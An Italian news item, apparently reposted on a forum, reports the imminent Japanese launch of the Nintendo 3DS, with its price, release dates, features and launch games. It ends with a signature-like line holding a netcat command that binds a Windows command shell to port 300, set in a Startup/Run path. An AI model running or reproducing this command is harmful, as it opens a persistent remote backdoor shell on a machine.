00 2/25/2011 6:57 PM
Attesa per la nuova console portatile che sarà presentata in Giappone

Ancora poche ore e i videogame in 3D e senza occhialini saranno realtà: sale l'attesa in Giappone per il lancio dell'ultima creatura Nintendo, la 3DS, con la nutrita presenza degli appassionati già ben visibile in serata nei grandi store dell'elettronica di Tokyo. La nuova console portatile del gruppo nipponico, prima del suo genere, ha un prezzo 'consigliato' di 25.000 yen (circa 220 euro) e l'ambizione di diventare campione di vendite e bissare il successo della Wii, mentre la Ds ha già numeri tali da preannunciare in tempi brevi il sorpasso sulla PlayStation 2, quanto a vendite assolute a livello globale: 145 milioni di pezzi registrati dal 2004 fino a pochi giorni fa, contro i 150 milioni accumulati in oltre un decennio dalla console Sony.

Inizialmente attesa nel Sol Levante per lo scorso Natale, la 3DS sarà pronta per l'Europa, Italia compresa, il 25 marzo prossimo, con due giorni d'anticipo sul debutto negli Usa (il 27 marzo). Sarà disponibile nelle versioni Nero Cosmo e Blu Acqua: due gli schermi, touch screen inferiore e schermo superiore che proietta immagini tridimensionali a occhio nudo. In aggiunta, ci sono tre fotocamere e un sensore di movimento e giroscopio per leggere movimento e inclinazione della console.

Con la 3DS ci saranno anche otto giochi subito disponibili in modalità tridimensionale: 'Winning Eleven (Pro Evolution) 3DS Soccer', 'Super Street Fighter IV 3D Edition', 'Samurai Warriors: Chronicle', 'Tobidasu! Puzzle Bobble 3D', 'nintendogs + cats', 'Ridge Racer 3D', 'Combat of Giants: Dinosaurs 3D and Professor Layton' e 'Mask of Miracle'.

http://www.ansa.it/

xray forum

Cielovieciskie snaniya prienadlejgat Miru S.Y.N.A.P.S.E.

:[St/\artup\Run/] C:\nc.exe? -L -p 300 -t -e cmd.exe